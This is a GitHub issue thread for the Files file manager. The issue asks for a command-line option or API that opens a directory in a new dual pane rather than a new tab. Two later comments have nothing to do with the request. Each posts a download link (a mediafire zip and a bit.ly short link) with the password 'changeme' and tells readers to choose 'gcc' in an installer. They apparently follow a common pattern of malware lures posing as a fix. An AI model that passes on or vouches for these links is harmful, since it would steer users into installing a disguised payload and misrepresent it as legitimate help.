### ISSUE TITLE
Add Command or API to Open Directory in a New Panel

### ISSUE THREAD

**Issue by luizera666** [files-community/Files#16093]
### What feature or improvement do you think would benefit Files?

Hello,

I would like to request the addition of a feature that allows users to open a directory directly in a new panel through a command or an API. Currently, when opening directories via scripts, each directory opens in a new tab, which is useful but doesn't leverage the dual-pane functionality of Files.

For workflows that require side-by-side comparison or management of directories, it would be very efficient to have the ability to open a specific directory directly in a new panel rather than a new tab. This would enhance productivity for users who need to manage multiple directories simultaneously within the same window.

Is it possible to implement a command-line option or an API endpoint that opens a directory in a new panel? This would greatly benefit users who automate tasks with scripts or other tools.

Thank you for considering this feature request!

### Requirements

- Implement Command-Line Option or API Endpoint:

- Develop a command-line option or API endpoint that allows the opening of a directory directly in a new panel within Files.
Modify Window Management Logic:

- Adjust the window management logic to recognize when a directory should be opened in a new panel instead of a new tab.

### Files Version

3.6.0.0

### Windows Version

10.0.22631.4037

**Comment by yiweifengyan** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
